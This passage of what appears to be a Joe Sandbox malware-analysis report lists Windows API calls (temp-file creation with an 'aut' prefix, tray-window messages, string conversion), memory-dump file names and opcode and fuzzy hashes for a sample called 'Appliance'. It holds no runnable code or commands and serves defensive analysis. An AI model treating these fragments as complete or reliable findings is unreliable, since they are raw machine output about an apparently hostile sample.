                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                            • API String ID: 55579361-631824599
                                                                                                                                            • Opcode ID: 5630a82818e7ce6d2f5e770aeed3099d4e18a4564a76deb16b05d20ac9ac13aa
                                                                                                                                            • Instruction ID: c0650c1769f516a4613fb3e087a7ce85d7d7edb00b6e4d5687573b417633700f
                                                                                                                                            • Opcode Fuzzy Hash: 5630a82818e7ce6d2f5e770aeed3099d4e18a4564a76deb16b05d20ac9ac13aa
                                                                                                                                            • Instruction Fuzzy Hash: 86E06D747003628FD730AF26E805702BBE4EB04345F048D1DE886D2751EBB5D488CBB2
                                                                                                                                            APIs
                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 00DDF151
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                            • String ID: `5$h5
                                                                                                                                            • API String ID: 1385522511-2563461917
                                                                                                                                            • Opcode ID: f34a6f212e5f6480a3ff0f72086834283369a04fef113930cb2b2f1534ebaf16
                                                                                                                                            • Instruction ID: b94d5d4998c1750ee4ef6ae795de7acf9b48f2c05334827872c9dbf4ee1c11e4
                                                                                                                                            • Opcode Fuzzy Hash: f34a6f212e5f6480a3ff0f72086834283369a04fef113930cb2b2f1534ebaf16
                                                                                                                                            • Instruction Fuzzy Hash: 5CE02631404A54CFCB00E73CE802E8833A0EB4C32CB360277E103A73D18B202E82CA34
                                                                                                                                            APIs
                                                                                                                                            • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00E339F0
                                                                                                                                            • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00E33A05
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Temp$FileNamePath
                                                                                                                                            • String ID: aut
                                                                                                                                            • API String ID: 3285503233-3010740371
                                                                                                                                            • Opcode ID: 0f30ce95aac22dd1adfcb74b21ad7e8fca9064332c9c515ff99e5efde8174dd4
                                                                                                                                            • Instruction ID: bc38d9d68b8c01c111e495ec6561a97f0e78fa76a575e55b02837bbd6a5956f6
                                                                                                                                            • Opcode Fuzzy Hash: 0f30ce95aac22dd1adfcb74b21ad7e8fca9064332c9c515ff99e5efde8174dd4
                                                                                                                                            • Instruction Fuzzy Hash: C9D05B75544314ABDA34A7559C0DFCB7A6CDB44711F000591BA95A10A1DAB0D549C790
                                                                                                                                            APIs
                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E52E08
                                                                                                                                            • PostMessageW.USER32(00000000), ref: 00E52E0F
                                                                                                                                              • Part of subcall function 00E2F292: Sleep.KERNEL32 ref: 00E2F30A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                                            • Opcode ID: 712622d1ca6abc66f1f9685531e06c95033d3c04f71d23cc583f0ccce6911476
                                                                                                                                            • Instruction ID: 8d314af73af36b50da61203743ad008475e61ae51361740ac67df319ec7b17a3
                                                                                                                                            • Opcode Fuzzy Hash: 712622d1ca6abc66f1f9685531e06c95033d3c04f71d23cc583f0ccce6911476
                                                                                                                                            • Instruction Fuzzy Hash: A2D0A932389310AAE238B330AC0BFC22B64AB00B02F600C21B249BA0E0C8E0A800C644
                                                                                                                                            APIs
                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E52DC8
                                                                                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00E52DDB
                                                                                                                                              • Part of subcall function 00E2F292: Sleep.KERNEL32 ref: 00E2F30A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                                            • Opcode ID: 2b52317fbde724752b481b57384655d3bd22aac45edffbcc38ce7f6768fcb348
                                                                                                                                            • Instruction ID: 090d49bed58367402263e41ee05d141ed5dde07bec725567f1bf7b1f2cfc5c5b
                                                                                                                                            • Opcode Fuzzy Hash: 2b52317fbde724752b481b57384655d3bd22aac45edffbcc38ce7f6768fcb348
                                                                                                                                            • Instruction Fuzzy Hash: 3FD0A936388310AAE238B330AC0BFD22B64AB00B02F200C21B249BA0E0C8E0A800C640
                                                                                                                                            APIs
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00DFC213
                                                                                                                                            • GetLastError.KERNEL32 ref: 00DFC221
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00DFC27C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1717984340-0
                                                                                                                                            • Opcode ID: 53c1bdae00675ceadad86f6f5101a525c5556dd4f7aa00939ce53d5c22679a49
                                                                                                                                            • Instruction ID: 2adc7905ef8982cde0d52abbb92235a7927b55a03652cb3c2119c737228465e6
                                                                                                                                            • Opcode Fuzzy Hash: 53c1bdae00675ceadad86f6f5101a525c5556dd4f7aa00939ce53d5c22679a49
                                                                                                                                            • Instruction Fuzzy Hash: CC412C3061120DEFDB259FE5CA44BBA77A4EF11310F1AD169FA559B191EB308D20C774